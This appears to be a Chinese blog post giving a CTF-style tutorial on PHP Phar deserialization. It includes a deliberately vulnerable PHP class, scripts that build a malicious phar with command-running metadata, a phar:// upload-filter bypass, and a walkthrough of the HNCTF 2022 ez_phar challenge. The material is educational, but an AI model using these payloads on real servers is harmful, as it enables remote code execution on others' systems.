<!--
	作者：Sariay
	时间：2018-08-26
	描述：There may be a bug, but don't worry, Qiling(器灵) says that it can work normally! aha!
-->
<!DOCTYPE html>
<html class="html-loading">
		

<head>
	<meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no">
  <title>
    
      Phar反序列化漏洞演示 | Su@sU的世界
    
  </title>
  <meta name="author" content="Su@sU">
  <meta name="keywords" content="web 游戏" />
  <meta name="description" content="一个什么都感兴趣的人的胡思乱想" />
	<!-- favicon -->
  <link rel="shortcut icon" href="/img/favicon.ico">

  <!-- css -->
  
<link rel="stylesheet" href="/css/Annie.css">

  
  <!-- jquery -->
	
<script src="/plugin/jquery/jquery.min.js"></script>


<script>
    const CONFIG_BGIMAGE = {
      mode: 'normal',
      normalSrc: '/img/header-bg.jpg',
      randomYouMax: 110,
      randomYouSrc: 'https://sariay.github.io/Random-img/',
	  randomOtherSrc: 'https://api.berryapi.net/?service=App.Bing.Images&day=-0',
	  preloaderEnable: true
    }
	
    const CONFIG_LEACLOUD_COUNT = {
      enable: false,
	  appId: 'AU8...',
	  appKey: '4cU...',
	  serverURLs: 'http' || ' '
    }
  </script>
<meta name="generator" content="Hexo 8.1.1"></head>
	<body>
		<!-- Preloader -->

	<div id="preloader">
		<div class="pre-container">
			
				<div class="spinner">
					<div class="double-bounce1"></div>
					<div class="double-bounce2"></div>
				</div>
						
		</div>
	</div>


<!-- header -->
<header class="fixbackground bg-pan-br">
	<div class="mask">
		<!-- motto -->
		<div class="h-body">	
			
				<div class="motto text-shadow-pop-left">
					<p class="content" id="motto-content">获取中...</p>
					<p>-<p>
					<p class="author" id="motto-author">Just a minute...</p>
				</div>
			
		</div>
		
		<!-- others: such as time... -->			
		<div class="h-footer">
			<a href="javascript:;" id="read-more" class="scroll-down">
				<span class="icon-anchor1 animation-scroll-down"></span>
			</a>
		</div>
	</div>
</header>

<div id="navigation-hide">
	<!-- Progress bar -->
	<div id="progress-bar"></div>

	<!-- Progress percent -->
	<div id="progress-percentage"><span>0.0%</span></div>

	<div class="toc-switch"><span class="switch-button">目录</span></div>

	<!-- Page title -->
	<p>
		
			「Phar反序列化漏洞演示」
		
	</p>

	
	

	<!-- Nav trigger for navigation-H-->
	<a class="nav-trigger"><span></span></a>
</div>

<!-- Navigation in div(id="navigation-H") -->
<nav class="nav-container" id="cd-nav">
	<div class="nav-header">
		<span class="logo"> 
			<img src="/img/logo.png">
		</span>
		<a href="javascript:;" class="nav-close"></a>
	</div>
	
	<div class="nav-body">
		<ul id="global-nav">
	
		<li class="menu-home">
			<a href="/" class="menu-item-home" target="_blank">主页</a>
		</li>
		
	
		<li class="menu-archive">
			<a href="/archives" class="menu-item-archive" target="_blank">归档</a>
		</li>
		
	
		<li class="menu-categories">
			<a href="/categories" class="menu-item-categories" target="_blank">分类</a>
		</li>
		
	
		<li class="menu-tags">
			<a href="/tags" class="menu-item-tags" target="_blank">标签</a>
		</li>
		
	
		<li class="menu-about">
			<a href="/about" class="menu-item-about" target="_blank">关于</a>
		</li>
		
	
		<li class="menu-gallery">
			<a href="/gallery" class="menu-item-gallery" target="_blank">相册</a>
		</li>
		
	

	
		<li class="menu-search">
			<a href="javascript:;" class="popup-trigger">搜索</a>
		</li>
	
</ul>
	</div>
	
	<div class="nav-footer">
		<ul id="global-social">
	
		<li>
			<a href="http://github.com/" target="_blank">
				<span class="icon-one"><span class="path1"></span><span class="path2"></span></span>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<span class="icon-zhihu"></span>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<span class="icon-github"></span>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<span class="icon-sina-weibo "></span>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<span class="icon-pinterest2"></span>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<span class="icon-instagram"></span>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<span class="icon-twitter"></span>
			</a>
		</li>
	
		<li>
			<a href="/atom.xml" target="_blank">
				<span class="icon-rss"></span>
			</a>
		</li>
			
</ul>

	</div>
</nav>
			
		<!--main-->
		<main>
			<!--
	时间：2018-11-17
	描述：
		插件名称：katelog.min.js
		插件作者：KELEN
		插件来源: https://github.com/KELEN/katelog
-->

	
		<div class="layout-toc">
			<div id="layout-toc">
				<div class="k-catelog-list" id="catelog-list" data-title="文章目录"></div>
			</div>
		</div>

		
<script src="/plugin/toc/katelog.min.js"></script>


		
	 

<div class="layout-post">
	<div id="layout-post">
		<div class="article-title">
			
	<a href="/2026/03/13/Phar%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/" itemprop="url">
		Phar反序列化漏洞演示
	</a>

		</div>

		<div class="article-meta">
			<span>
				<i class="icon-calendar1"></i>
				
				




	更新于

	<a href="/2026/03/13/Phar%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/" itemprop="url">
		<time datetime="2026-03-13T04:00:00.000Z" itemprop="dateUpdated">
	  		2026-03-13
	  </time>
	</a> 



			</span>
			<span>
						
			</span>
			
			



		</div>

		<div class="article-content" id="article-content">
			<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>我们在之前学习的反序列化漏洞 无一不是利用了unserialize()这个函数 但是我们没有去考虑 假设此时的题目并没有给我们这个函数 我们还能否实现反序列化呢</p>
<p>其实是可以的 在2018年的BlackHat 大会上 Sam Thomas研究员分享了一个方法 可以在<strong>文件系统函数</strong>的参数可控的情况下 配合phar协议 不依赖unserialize函数进行反序列化</p>
<h2 id="phar文件"><a href="#phar文件" class="headerlink" title="phar文件"></a>phar文件</h2><p>在此之前我们需要先学习一下phar文件 这是php中的一种打包格式 可以粗略的将其理解为一个将多个文件打包在一块的<strong>整合包</strong><br>它主要有四个部分组成</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">1. stub部分：这是phar文件的标识 可以理解为一个标志 格式为xxx&lt;?php xxx; __HALT_COMPILER();?&gt; 最关键的是后面的这个__HALT_COMPILER();?&gt;结尾 前面的内容没有限制</span><br><span class="line">   </span><br><span class="line">2. Manifest部分：这是一个我呢见清单 包含了文件个数 文件权限等等信息 值得注意的是 这部分支持用户自定义meta-data信息 并且会以序列化的显示存储这也导致了phar反序列化</span><br><span class="line">   </span><br><span class="line">3. file content部分：文件实际内容</span><br><span class="line">   </span><br><span class="line">4. signature部分：这是可选的部分 是一个前面 放在文件的末尾</span><br><span class="line">   </span><br></pre></td></tr></table></figure>
<h2 id="原理分析"><a href="#原理分析" class="headerlink" title="原理分析"></a>原理分析</h2><p>那么假设现在的靶机情况是这样的 ：</p>
<p>存在一个危险的类 其中有destruct等魔术方法 会在对象创建销毁 反序列化发生等关键时候触发代码执行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class Test &#123;</span><br><span class="line">    public $cmd = &#x27;whoami&#x27;;</span><br><span class="line">    public function __destruct() &#123;</span><br><span class="line">        system($this-&gt;cmd);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">$filename = $_GET[&#x27;filename&#x27;];  </span><br><span class="line">file_exists($filename);</span><br></pre></td></tr></table></figure>
<p>此时我们就可以在本地仿照这个类编写一个phar文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class Test &#123;</span><br><span class="line">    public $cmd = &#x27;whoami&#x27;;</span><br><span class="line">    public function __destruct() &#123;</span><br><span class="line">        system($this-&gt;cmd);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">//删除同名文件 防止创建失败 同时使用错误抑制符防止报错</span><br><span class="line">@unlink(&quot;test.phar&quot;);</span><br><span class="line"></span><br><span class="line">// 创建Phar对象</span><br><span class="line">$phar = new Phar(&#x27;test.phar&#x27;);</span><br><span class="line"></span><br><span class="line">//startBuffering():开始缓存对Phar的修改 从此时 在调用stopBuffering()之前所有更改不会实际写入磁盘</span><br><span class="line">$phar-&gt;startBuffering();</span><br><span class="line"></span><br><span class="line">// 添加一个虚拟文件 文件名叫做test.txt 文件内容是test 因为phar文件知识一个整合包 你最中访问具体的路径得有一个具体的文件做落脚石</span><br><span class="line">$phar-&gt;addFromString(&#x27;test.txt&#x27;, &#x27;text&#x27;); </span><br><span class="line"></span><br><span class="line">//创建Test类的实例</span><br><span class="line">$b =new Test();</span><br><span class="line"></span><br><span class="line">// 设置stub</span><br><span class="line">$phar-&gt;setStub(&#x27;&lt;?php __HALT_COMPILER(); ?&gt;&#x27;); </span><br><span class="line"></span><br><span class="line">// 将恶意对象设置为元数据</span><br><span class="line">$phar-&gt;setMetadata($b);</span><br><span class="line"></span><br><span class="line">//结束缓冲 将内存中的操作刷到磁盘 自动计算phar文件的签名</span><br><span class="line">$phar-&gt;stopBuffering();</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>经过上述操作 test.phar 文件创建完成<br>（注意 要将php.ini中的phar.readonly选项设置为Off，否则无法生成phar文件）<br>此时我们只需要把这个phar文件上传到目标靶机<br>然后利用靶机php文件之中的</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$filename = $_GET[&#x27;filename&#x27;];  </span><br><span class="line">file_exists($filename);</span><br></pre></td></tr></table></figure>
<p>这一部分 这一部分调用了文件操作函数 这些函数操作phar文件的时候会触发元数据的反序列化 </p>
<p>此时被反序列化之后 触发魔术方法   执行恶意的诸如命令 攻击成功<br>在先知社区的文章之中提供了这样一张图片 展示了收到这个漏洞高攻击影响的函数有以下几种</p>
<img src="/2026/03/13/Phar%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/function.png" class="" title="function">
<p>当这些函数直接使用我们传入的路径为参数的时候 就i有Phar反序列化的攻击之处</p>
<p>但是很多时候 文件上传的入口是不运行我们直接传入phar文件的 更大概率是会存在黑名单或者白名单 此时应该怎么办呢？<br>这时候我们可以使用<code>phar：//</code>伪协议 这个</p>
<h3 id="phar伪协议"><a href="#phar伪协议" class="headerlink" title="phar伪协议"></a>phar伪协议</h3><p>这个协议是php解压缩包的一个函数 不管后缀是什么 都会将路径下的文件当作压缩包来解压<br><strong>语法</strong>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">phar://压缩包路径/压缩包内部文件名</span><br></pre></td></tr></table></figure>
<p>利用<code>phar：//</code>伪协议不管扫描后缀都会当作压缩包来解压的特性 我们可以修改test.phar的后缀为可以通过后缀名检测的任意后缀 之后继续包含就行</p>
<h2 id="例题演示"><a href="#例题演示" class="headerlink" title="例题演示"></a>例题演示</h2><h3 id="HNCTF-2022-WEEK3-ez-phar"><a href="#HNCTF-2022-WEEK3-ez-phar" class="headerlink" title="[HNCTF 2022 WEEK3]ez_phar"></a>[HNCTF 2022 WEEK3]ez_phar</h3><img src="/2026/03/13/Phar%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/test.png" class="" title="test">
<p>我们点进来看到这是一个反序列化题目 但是没有unserialize（）<br>同时发现这里面有文件操作函数<code>file_exists（）</code>很明显这是一个phar反序列化题目 对于这种题目 还需要一个文件上传页面<br>使用dirsearch扫一下 找到了upload.php</p>
<img src="/2026/03/13/Phar%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/submit.png" class="" title="submit">
<p>ok那么现在万事俱备了 开始编写phar文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php  </span><br><span class="line">error_reporting(1);  </span><br><span class="line">class Flag&#123;  </span><br><span class="line">    public $code;  </span><br><span class="line">&#125;  </span><br><span class="line">  </span><br><span class="line">    @unlink(&quot;phar.phar&quot;);  </span><br><span class="line">    $phar = new Phar(&quot;phar.phar&quot;); //后缀名必须为phar  </span><br><span class="line">    $phar-&gt;startBuffering();  </span><br><span class="line">    $phar-&gt;setStub(&quot;&lt;?php __HALT_COMPILER(); ?&gt;&quot;); //设置stub  </span><br><span class="line">    $o = new Flag();  </span><br><span class="line">    $o -&gt;code  = &quot;system(&#x27;ls&#x27;);&quot;;  </span><br><span class="line">    $phar-&gt;setMetadata($o); //将自定义的meta-data存入manifest  </span><br><span class="line">    $phar-&gt;addFromString(&quot;test.txt&quot;, &quot;test&quot;); //添加要压缩的文件  </span><br><span class="line">    //签名自动计算  </span><br><span class="line">    $phar-&gt;stopBuffering();</span><br></pre></td></tr></table></figure>
<p>此时这个phar文件就会生成在你写以上代码的文件的相同目录之下<br>我们将其上传一下看看<img src="/2026/03/13/Phar%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/range.png" class="" title="range"><br>发现过滤了后缀名 那么就将phar文件后缀改成.png之后使用phar伪协议上传<img src="/2026/03/13/Phar%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/success.png" class="" title="success"><br>上传成功 此时我们来到第一个页面 使用phar伪协议<img src="/2026/03/13/Phar%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/ls.png" class="" title="ls"><br>可以看到反序列化成功 ls被成功执行 接下来就是修改RCE内容 得到flag<img src="/2026/03/13/Phar%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/flag.png" class="" title="flag"></p>
<h2 id="小解"><a href="#小解" class="headerlink" title="小解"></a>小解</h2><p>phar反序列化主要利用的知识是<strong>数据（Metadata）是以序列化（serialize）格式存储的</strong> 当通过<code>phar://</code>协议访问Phar文件时 PHP会<strong>自动反序列化（unserialize）元数据</strong> 无论是否实际使用这些元数据</p>
<p>主要利用有几个前提：</p>
<ol>
<li>php.ini中的phar.readonly选项设置为Off</li>
<li>存在文件操作函数</li>
<li>存在文件上传页面</li>
</ol>
<p>参考文章：<br><a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/2638#toc-0">Phar与Stream Wrapper造成PHP RCE的深入挖掘-先知社区</a><br><a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/2638#toc-0">Phar与Stream Wrapper造成PHP RCE的深入挖掘-先知社区</a></p>
	
		</div>
		
		<div id="current-post-cover" data-scr="/img/cart_cover.jpg"></div>

		<!-- relate post, comment...-->
		<div class="investment-container">
			<div class="investment-header">
				<div class="investment-title-1">
					<div class="on">相关文章</div>
					<div>评论</div>
					<div>分享</div>
				</div>
				<div class="investment-title-2">	            
					
	<span>
		<a id="totop-post-page">返回顶部</a>
		
			<a href="/2026/04/19/filter-chain%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/" title="filter-chain漏洞演示" rel="prev">
				&laquo;上一篇
			</a>
		
		
			<a href="/2026/03/12/pearcmd%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/" title="pearcmd漏洞演示" rel="next">
				下一篇&raquo;
			</a>
			
	</span>


      		
				</div>	
			</div>
			
			<div class="investment-content">
				<div class="investment-content-list">
					

<div class="relate-post">
	
		<ul>
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2026/04/19/%E6%AD%BB%E4%BA%A1%E7%BB%95%E8%BF%87/" title="死亡绕过">
								死亡绕过			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								四月 19日, 2026				
							</p>
							<p class="relate-post-content">
								前言以及环境介绍本文是对p神文章谈一谈php:&#x2F;&#x2F;filter的妙用 | 离别歌知识点的学习
本文主要介绍使用filter伪协议进行死亡绕过的三种方式
测试环境：小皮面板测试代码：exit.php
12345&lt...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2026/04/19/%E6%AD%BB%E4%BA%A1%E7%BB%95%E8%BF%87/" title="死亡绕过">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/cart_cover.jpg" alt="死亡绕过"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2026/04/19/filter-chain%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/" title="filter-chain漏洞演示">
								filter-chain漏洞演示			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								四月 19日, 2026				
							</p>
							<p class="relate-post-content">
								这个漏洞链被称为CNEXT 由安全员Charles Fol披露
核心思想是利用系统内置的看似无害的模块（流过滤器）的巧妙组合 在受限的web环境之中执行命令
原理讲解filter协议对于filter伪协议 我们肯定都不陌生这个伪协议允...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2026/04/19/filter-chain%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/" title="filter-chain漏洞演示">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/cart_cover.jpg" alt="filter-chain漏洞演示"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2026/03/12/pearcmd%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/" title="pearcmd漏洞演示">
								pearcmd漏洞演示			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								三月 12日, 2026				
							</p>
							<p class="relate-post-content">
								1register_argc_argv性质这是PHP中的一个配置项 用于决定是否在脚本中声明_$argc_ 和 _$argv_ 变量这两个变量在命令行模式下是十分重要的

$argc：表示传递给脚本的参数数量
$argv:这是一个数组...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2026/03/12/pearcmd%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/" title="pearcmd漏洞演示">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/cart_cover.jpg" alt="pearcmd漏洞演示"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2026/03/10/session%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%B5%8B%E8%AF%95/" title="session反序列化漏洞测试">
								session反序列化漏洞测试			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								三月 10日, 2026				
							</p>
							<p class="relate-post-content">
								前置知识首先我们要了解session是什么
session又被称为会话控制  和cookie类似 用于保持会话的但是cookie一般是存储再客户端的 session一般是存储在服务端的
在PHP中 有一个php_session变量 用...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2026/03/10/session%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%B5%8B%E8%AF%95/" title="session反序列化漏洞测试">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/cart_cover.jpg" alt="session反序列化漏洞测试"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2026/02/16/%E6%9C%AA%E5%91%BD%E5%90%8D/" title="好东西">
								好东西			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								二月 16日, 2026				
							</p>
							<p class="relate-post-content">
								hello world

							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2026/02/16/%E6%9C%AA%E5%91%BD%E5%90%8D/" title="好东西">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/cart_cover.jpg" alt="好东西"/>
							</a>
						</div>
					</li>												
			
		</ul>
	
</div>	
				</div>
				<div class="investment-content-list">
					<div class="layout-comment">

	
		<div class="config-info">
			Please check the parameter of <b>comment</b> in config.yml of hexo-theme-Annie!
		</div>	
	

</div>
				</div>
				<div class="investment-content-list">
					<div class="layout-share">
	
	

		
			
			<!-- socialShare share -->
			<div class="social-share"></div>

<!--  css & js -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/css/share.min.css">
<script async src="https://cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script>
			
		
		
	
</div>


				</div>
			</div>	
		</div>
	</div>
</div>

<!-- show math formula -->



	





<link rel="stylesheet" href="/plugin/fancybox/jquery.fancybox.css">


<script src="/plugin/fancybox/jquery.fancybox.js"></script>


<script type="text/javascript">
	(function gallerySet(){
		let titleID = $('.article-title a'),
			imageID = $('.article-content img'),
			videoID = $('.article-content video');
		
		let postTitle = titleID.text() ? titleID.text() : "No post title!";
		
		imageID.each(function() {
			let imgPath = $(this).attr('src'),
				imgTitle = $(this).attr('alt') ? $(this).attr('alt') : "No image description!";
		
			//给每个匹配的<img>元素打包, 即添加父元素<a>
			$(this).wrap('<a data-fancybox="gallery" data-caption="《 ' + postTitle + ' 》' + imgTitle + '"href="' + imgPath + '"> </a>');
		});
		
		videoID.each(function() {
			let videoPath = $(this).attr('src');
		
			//给每个匹配的<img>元素打包, 即添加父元素<a>
			$(this).wrap('<a data-fancybox href=" ' + videoPath + ' "> </a>');
		});
		
		//TODO：支持html5 video

		if($('#layout-post').length) {
			$('[data-fancybox="gallery"]').fancybox({
				loop: true,
				buttons: [
					"zoom",
					"share",
					"slideShow",
					"fullScreen",
					//"download",
					"thumbs",
					"close"
				],
				protect: true
			});
		}
	})();
</script>
		</main>

		<!--footer-->
		<footer>
	<div id="navigation-show">
		<ul id="global-nav">
	
		<li class="menu-home">
			<a href="/" class="menu-item-home" target="_blank">主页</a>
		</li>
		
	
		<li class="menu-archive">
			<a href="/archives" class="menu-item-archive" target="_blank">归档</a>
		</li>
		
	
		<li class="menu-categories">
			<a href="/categories" class="menu-item-categories" target="_blank">分类</a>
		</li>
		
	
		<li class="menu-tags">
			<a href="/tags" class="menu-item-tags" target="_blank">标签</a>
		</li>
		
	
		<li class="menu-about">
			<a href="/about" class="menu-item-about" target="_blank">关于</a>
		</li>
		
	
		<li class="menu-gallery">
			<a href="/gallery" class="menu-item-gallery" target="_blank">相册</a>
		</li>
		
	

	
		<li class="menu-search">
			<a href="javascript:;" class="popup-trigger">搜索</a>
		</li>
	
</ul>
	</div>

	<div class="copyright">
		<p>
			 
				&copy;2025 - 2026, content by Su@sU. All Rights Reserved.
			
			
				<a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a> Theme <a href="https://github.com/Sariay/hexo-theme-Annie" title="Annie" target="_blank" rel="noopener">Annie</a> by Sariay.
			
		</p>
		<p>
			

	<!-- busuanzi -->
	<!-- busuanzi -->



			<a href="javascript:zh_tran('s');" class="zh_click" id="zh_click_s">简体</a> 
			<a href="javascript:zh_tran('t');" class="zh_click" id="zh_click_t">繁體</a>				
		</p>
	</div>		
</footer>
		
	<!-- Local or hitokoto! -->

	
<script src="/plugin/motto/motto.js"></script>

	
	<script type="text/javascript">
		(function motto(){
			let mottoText = getMingYanContent().split('</br> - </br>'),
			
			mottoTextContent = mottoText[0]?mottoText[0]:'请刷新...',
			
			mottoTextFrom = mottoText[1]?mottoText[1]:'one/一个';
			
			mottoTextContent = mottoTextContent.trim().substring(0, 100);
		
			$("#motto-content").html( mottoTextContent);
			$("#motto-author").html( mottoTextFrom  );
		})();	
	</script>	



<!-- love effect -->

	
<script src="/plugin/love/love.js"></script>



<!-- back to top -->

	<div id="totop">
	<span class="icon-circle-up"></span>
</div>



<!-- site analysis -->


	<!-- site-analysis -->
	
	
	
	
	
 

<!-- leancloud -->


	<!-- leancloud -->
	<!--
	时间：2018-11-27
	描述：
		文章访问量：visitors
		文章喜欢量：likes	
		文章排行榜：topNPost
		其他得说明：
			01-Cookie相关的函数 
				https://blog.csdn.net/somehow1002/article/details/78511541（Author：somehow1002）
			02-visitors相关的函数 
				https://blog.csdn.net/u013553529/article/details/63357382（Author：爱博客大伯）
				https://notes.doublemine.me/2015-10-21-为NexT主题添加文章阅读量统计功能.html（Author：夏末）
			03-topNPost相关的函数
				https://hoxis.github.io/hexo-next-read-rank.html（Author：hoxis）
			04-likes相关的函数，
				参考了01 & 02进行简单的设计与实现
-->


	

  

	<!--
	时间：2018-10-3
	描述：
		插件名称：hexo-generator-search-zip
		插件来源: https://github.com/SuperKieran/hexo-generator-search-zip
		代码参考：https://github.com/SuperKieran/TKL/blob/master/layout/_partial/search.ejs(Include: js & css)	
-->
<div class="popup search-popup local-search-popup scrollbar" >
	<div class="local-search-container">
		<span class="popup-btn-close">
      		ESC
   		</span>
		<div class="local-search-header">
			<div class="input-prompt">				
			</div>
			<input autocomplete="off" placeholder="Search..." type="text" id="local-search-input">
		</div>
		<div class="local-search-body">
			<div id="local-search-output"></div>
		</div>
		<div class="local-search-footer">
			<div class="topN-post">				
				
								
			</div>
		</div>
	</div>
</div>


<script src="/plugin/search/ziploader.js"></script>
<script src="/js/search.js"></script>


<script type="text/javascript">
	var search_path = 'search.xml',
		zip_Path = '/',
		version_Path = '/',
		input_Trigger = 'auto',
		top_N = '2';

	themeLocalSearch({
		search_path, 
		zip_Path, 
		version_Path, 
		input_Trigger, 
		top_N
	});
</script>



<script src="/plugin/chinese/chinese.js"></script>
<script src="/plugin/imagelazyloader/yall.min.js"></script>
<script src="/plugin/imageloaded/imagesloaded.pkgd.min.js"></script>
<script src="/plugin/nicescroll/jquery.nicescroll.js"></script>
<script src="/plugin/resizediv/resizediv.js"></script>
<script src="/js/main.js"></script>

	</body>	
</html>